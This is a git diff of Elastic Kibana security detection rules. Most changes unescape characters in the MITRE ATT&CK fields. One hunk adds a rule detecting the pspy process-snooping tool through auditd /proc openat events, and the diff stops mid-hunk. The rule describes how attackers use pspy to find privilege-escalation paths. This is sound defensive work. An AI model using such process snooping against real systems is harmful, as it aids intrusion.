- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/bd2c86a0-8b61-4457-ab38-96943984e889_105.json b/packages/security_detection_engine/kibana/security_rule/bd2c86a0-8b61-4457-ab38-96943984e889_105.json
index 84c3f0a17e1..42761c84d92 100644
--- a/packages/security_detection_engine/kibana/security_rule/bd2c86a0-8b61-4457-ab38-96943984e889_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/bd2c86a0-8b61-4457-ab38-96943984e889_105.json
@@ -48,7 +48,7 @@
 ],
 "risk_score": 47,
 "rule_id": "bd2c86a0-8b61-4457-ab38-96943984e889",
- "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
+ "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -61,7 +61,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0009",
 "name": "Collection",
@@ -83,7 +83,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
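Review bot: The new side of the `@@ -48,7 +48,7 @@` hunk still carries the duplicated word in `Steps to implement the logging policy with with Advanced Audit Configuration:`; the commit only normalizes the `\u003e` escapes and leaves the `setup` wording as it was. The same string recurs in the `_106` through `_111` versions of this rule below. The one-word fix is `Steps to implement the logging policy with Advanced Audit Configuration:`. If these historical version files are meant to stay frozen once published, the correction belongs in the next published version of the rule rather than here.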
diff --git a/packages/security_detection_engine/kibana/security_rule/bd2c86a0-8b61-4457-ab38-96943984e889_106.json b/packages/security_detection_engine/kibana/security_rule/bd2c86a0-8b61-4457-ab38-96943984e889_106.json
index 9914103bdce..065b8f9d8ce 100644
--- a/packages/security_detection_engine/kibana/security_rule/bd2c86a0-8b61-4457-ab38-96943984e889_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/bd2c86a0-8b61-4457-ab38-96943984e889_106.json
@@ -48,7 +48,7 @@
 ],
 "risk_score": 47,
 "rule_id": "bd2c86a0-8b61-4457-ab38-96943984e889",
- "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
+ "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0009",
 "name": "Collection",
@@ -82,7 +82,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/bd2c86a0-8b61-4457-ab38-96943984e889_107.json b/packages/security_detection_engine/kibana/security_rule/bd2c86a0-8b61-4457-ab38-96943984e889_107.json
index 13394c5474b..861a76f68be 100644
--- a/packages/security_detection_engine/kibana/security_rule/bd2c86a0-8b61-4457-ab38-96943984e889_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/bd2c86a0-8b61-4457-ab38-96943984e889_107.json
@@ -48,7 +48,7 @@
 ],
 "risk_score": 47,
 "rule_id": "bd2c86a0-8b61-4457-ab38-96943984e889",
- "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
+ "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0009",
 "name": "Collection",
@@ -82,7 +82,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/bd2c86a0-8b61-4457-ab38-96943984e889_108.json b/packages/security_detection_engine/kibana/security_rule/bd2c86a0-8b61-4457-ab38-96943984e889_108.json
index a2892450571..20d50cb62a9 100644
--- a/packages/security_detection_engine/kibana/security_rule/bd2c86a0-8b61-4457-ab38-96943984e889_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/bd2c86a0-8b61-4457-ab38-96943984e889_108.json
@@ -48,7 +48,7 @@
 ],
 "risk_score": 47,
 "rule_id": "bd2c86a0-8b61-4457-ab38-96943984e889",
- "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
+ "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0009",
 "name": "Collection",
@@ -82,7 +82,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/bd2c86a0-8b61-4457-ab38-96943984e889_109.json b/packages/security_detection_engine/kibana/security_rule/bd2c86a0-8b61-4457-ab38-96943984e889_109.json
index c1ace3d8913..f13ecd70dc3 100644
--- a/packages/security_detection_engine/kibana/security_rule/bd2c86a0-8b61-4457-ab38-96943984e889_109.json
+++ b/packages/security_detection_engine/kibana/security_rule/bd2c86a0-8b61-4457-ab38-96943984e889_109.json
@@ -48,7 +48,7 @@
 ],
 "risk_score": 47,
 "rule_id": "bd2c86a0-8b61-4457-ab38-96943984e889",
- "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
+ "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0009",
 "name": "Collection",
@@ -82,7 +82,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/bd2c86a0-8b61-4457-ab38-96943984e889_110.json b/packages/security_detection_engine/kibana/security_rule/bd2c86a0-8b61-4457-ab38-96943984e889_110.json
index 3497d9693d6..769d52933d7 100644
--- a/packages/security_detection_engine/kibana/security_rule/bd2c86a0-8b61-4457-ab38-96943984e889_110.json
+++ b/packages/security_detection_engine/kibana/security_rule/bd2c86a0-8b61-4457-ab38-96943984e889_110.json
@@ -48,7 +48,7 @@
 ],
 "risk_score": 47,
 "rule_id": "bd2c86a0-8b61-4457-ab38-96943984e889",
- "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
+ "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0009",
 "name": "Collection",
@@ -82,7 +82,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/bd2c86a0-8b61-4457-ab38-96943984e889_111.json b/packages/security_detection_engine/kibana/security_rule/bd2c86a0-8b61-4457-ab38-96943984e889_111.json
index 34343945cd7..163c54aee5e 100644
--- a/packages/security_detection_engine/kibana/security_rule/bd2c86a0-8b61-4457-ab38-96943984e889_111.json
+++ b/packages/security_detection_engine/kibana/security_rule/bd2c86a0-8b61-4457-ab38-96943984e889_111.json
@@ -48,7 +48,7 @@
 ],
 "risk_score": 47,
 "rule_id": "bd2c86a0-8b61-4457-ab38-96943984e889",
- "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n",
+ "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0009",
 "name": "Collection",
@@ -82,7 +82,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/bd3d058d-5405-4cee-b890-337f09366ba2_1.json b/packages/security_detection_engine/kibana/security_rule/bd3d058d-5405-4cee-b890-337f09366ba2_1.json
index 00f2a8766aa..1e0d40bc51b 100644
--- a/packages/security_detection_engine/kibana/security_rule/bd3d058d-5405-4cee-b890-337f09366ba2_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/bd3d058d-5405-4cee-b890-337f09366ba2_1.json
@@ -58,7 +58,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/bd7eefee-f671-494e-98df-f01daf9e5f17_102.json b/packages/security_detection_engine/kibana/security_rule/bd7eefee-f671-494e-98df-f01daf9e5f17_102.json
index 554c56c0db6..57b616a87fe 100644
--- a/packages/security_detection_engine/kibana/security_rule/bd7eefee-f671-494e-98df-f01daf9e5f17_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/bd7eefee-f671-494e-98df-f01daf9e5f17_102.json
@@ -59,7 +59,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/bd7eefee-f671-494e-98df-f01daf9e5f17_103.json b/packages/security_detection_engine/kibana/security_rule/bd7eefee-f671-494e-98df-f01daf9e5f17_103.json
index 3d5556a9261..cd2c9bb8221 100644
--- a/packages/security_detection_engine/kibana/security_rule/bd7eefee-f671-494e-98df-f01daf9e5f17_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/bd7eefee-f671-494e-98df-f01daf9e5f17_103.json
@@ -59,7 +59,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/bd7eefee-f671-494e-98df-f01daf9e5f17_104.json b/packages/security_detection_engine/kibana/security_rule/bd7eefee-f671-494e-98df-f01daf9e5f17_104.json
index a47577c715d..b0412dcdf7f 100644
--- a/packages/security_detection_engine/kibana/security_rule/bd7eefee-f671-494e-98df-f01daf9e5f17_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/bd7eefee-f671-494e-98df-f01daf9e5f17_104.json
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/bdb04043-f0e3-4efa-bdee-7d9d13fa9edc_1.json b/packages/security_detection_engine/kibana/security_rule/bdb04043-f0e3-4efa-bdee-7d9d13fa9edc_1.json
index 75649fadb98..9ff540a6b98 100644
--- a/packages/security_detection_engine/kibana/security_rule/bdb04043-f0e3-4efa-bdee-7d9d13fa9edc_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/bdb04043-f0e3-4efa-bdee-7d9d13fa9edc_1.json
@@ -11,7 +11,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Potential Pspy Process Monitoring Detected",
- "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.",
+ "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. 
With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.",
 "query": "sequence by process.pid, host.id with maxspan=5s\n[ file where host.os.type == \"linux\" and event.dataset == \"auditd_manager.auditd\" and \n auditd.data.syscall == \"openat\" and file.path == \"/proc\" and auditd.data.a0 : (\"ffffffffffffff9c\", \"ffffff9c\") and \n auditd.data.a2 : (\"80000\", \"88000\") ] with runs=10\n",
 "references": [
 "https://github.com/DominicBreuker/pspy"
@@ -67,7 +67,7 @@
 ],
 "risk_score": 21,
 "rule_id": "bdb04043-f0e3-4efa-bdee-7d9d13fa9edc",
- "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.",
+ "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. 
With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -77,7 +77,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/bdb04043-f0e3-4efa-bdee-7d9d13fa9edc_2.json b/packages/security_detection_engine/kibana/security_rule/bdb04043-f0e3-4efa-bdee-7d9d13fa9edc_2.json
index e259fe681ab..ae693498317 100644
--- a/packages/security_detection_engine/kibana/security_rule/bdb04043-f0e3-4efa-bdee-7d9d13fa9edc_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/bdb04043-f0e3-4efa-bdee-7d9d13fa9edc_2.json
@@ -77,7 +77,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/bdb04043-f0e3-4efa-bdee-7d9d13fa9edc_3.json b/packages/security_detection_engine/kibana/security_rule/bdb04043-f0e3-4efa-bdee-7d9d13fa9edc_3.json
index 3ffdb9520eb..1ca1776e9b6 100644
--- a/packages/security_detection_engine/kibana/security_rule/bdb04043-f0e3-4efa-bdee-7d9d13fa9edc_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/bdb04043-f0e3-4efa-bdee-7d9d13fa9edc_3.json
@@ -76,7 +76,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/bdb04043-f0e3-4efa-bdee-7d9d13fa9edc_4.json b/packages/security_detection_engine/kibana/security_rule/bdb04043-f0e3-4efa-bdee-7d9d13fa9edc_4.json
index 5c4b1bc78f0..dbd9fdbea55 100644
--- a/packages/security_detection_engine/kibana/security_rule/bdb04043-f0e3-4efa-bdee-7d9d13fa9edc_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/bdb04043-f0e3-4efa-bdee-7d9d13fa9edc_4.json
@@ -76,7 +76,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/bdb04043-f0e3-4efa-bdee-7d9d13fa9edc_5.json b/packages/security_detection_engine/kibana/security_rule/bdb04043-f0e3-4efa-bdee-7d9d13fa9edc_5.json
new file mode 100644
index 00000000000..871d1276bf0
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/bdb04043-f0e3-4efa-bdee-7d9d13fa9edc_5.json
@@ -0,0 +1,104 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "This rule leverages auditd to monitor for processes scanning different processes within the /proc directory using the openat syscall. This is a strong indication for the usage of the pspy utility. Attackers may leverage the pspy process monitoring utility to monitor system processes without requiring root permissions, in order to find potential privilege escalation vectors.",
+ "from": "now-9m",
+ "index": [
+ "logs-auditd_manager.auditd-*"
+ ],
+ "language": "eql",
+ "license": "Elastic License v2",
+ "name": "Potential Pspy Process Monitoring Detected",
+ "query": "sequence by process.pid, host.id with maxspan=5s\n[ file where host.os.type == \"linux\" and event.dataset == \"auditd_manager.auditd\" and \n auditd.data.syscall == \"openat\" and file.path == \"/proc\" and auditd.data.a0 : (\"ffffffffffffff9c\", \"ffffff9c\") and \n auditd.data.a2 : (\"80000\", \"88000\") ] with runs=10\n",
+ "references": [
+ "https://github.com/DominicBreuker/pspy"
+ ],
+ "related_integrations": [
+ {
+ "integration": "auditd",
+ "package": "auditd_manager",
+ "version": "^1.0.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": false,
+ "name": "auditd.data.a0",
+ "type": "unknown"
+ },
+ {
+ "ecs": false,
+ "name": "auditd.data.a2",
+ "type": "unknown"
+ },
+ {
+ "ecs": false,
+ "name": "auditd.data.syscall",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "file.path",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.id",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.os.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.pid",
+ "type": "long"
+ }
+ ],
+ "risk_score": 21,
+ "rule_id": "bdb04043-f0e3-4efa-bdee-7d9d13fa9edc",
+ "setup": "\nThis rule requires data coming in from Auditd Manager.\n\n### Auditd Manager Integration Setup\nThe Auditd Manager Integration receives audit 
events from the Linux Audit Framework which is a part of the Linux kernel.\nAuditd Manager provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system.\n\n#### The following steps should be executed in order to add the Elastic Agent System integration \"auditd_manager\" on a Linux System:\n- Go to the Kibana home page and click \u201cAdd integrations\u201d.\n- In the query bar, search for \u201cAuditd Manager\u201d and select the integration to see more details about it.\n- Click \u201cAdd Auditd Manager\u201d.\n- Configure the integration name and optionally add a description.\n- Review optional and advanced settings accordingly.\n- Add the newly installed \u201cauditd manager\u201d to an existing or a new agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n- Click \u201cSave and Continue\u201d.\n- For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/auditd_manager).\n\n#### Rule Specific Setup Note\nAuditd Manager subscribes to the kernel and receives events as they occur without any additional configuration.\nHowever, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n- For this detection rule the following additional audit rules are required to be added to the integration:\n -- \"-w /proc/ -p r -k audit_proc\"\n\n",
+ "severity": "low",
+ "tags": [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Discovery"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": 
"TA0007",
+ "name": "Discovery",
+ "reference": "https://attack.mitre.org/tactics/TA0007/"
+ },
+ "technique": [
+ {
+ "id": "T1057",
+ "name": "Process Discovery",
+ "reference": "https://attack.mitre.org/techniques/T1057/"
+ },
+ {
+ "id": "T1082",
+ "name": "System Information Discovery",
+ "reference": "https://attack.mitre.org/techniques/T1082/"
+ }
+ ]
+ }
+ ],
+ "type": "eql",
+ "version": 5
+ },
+ "id": "bdb04043-f0e3-4efa-bdee-7d9d13fa9edc_5",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/bdcf646b-08d4-492c-870a-6c04e3700034_103.json b/packages/security_detection_engine/kibana/security_rule/bdcf646b-08d4-492c-870a-6c04e3700034_103.json
index d4630750c41..d8483501801 100644
--- a/packages/security_detection_engine/kibana/security_rule/bdcf646b-08d4-492c-870a-6c04e3700034_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/bdcf646b-08d4-492c-870a-6c04e3700034_103.json
@@ -56,7 +56,7 @@
 ],
 "risk_score": 73,
 "rule_id": "bdcf646b-08d4-492c-870a-6c04e3700034",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
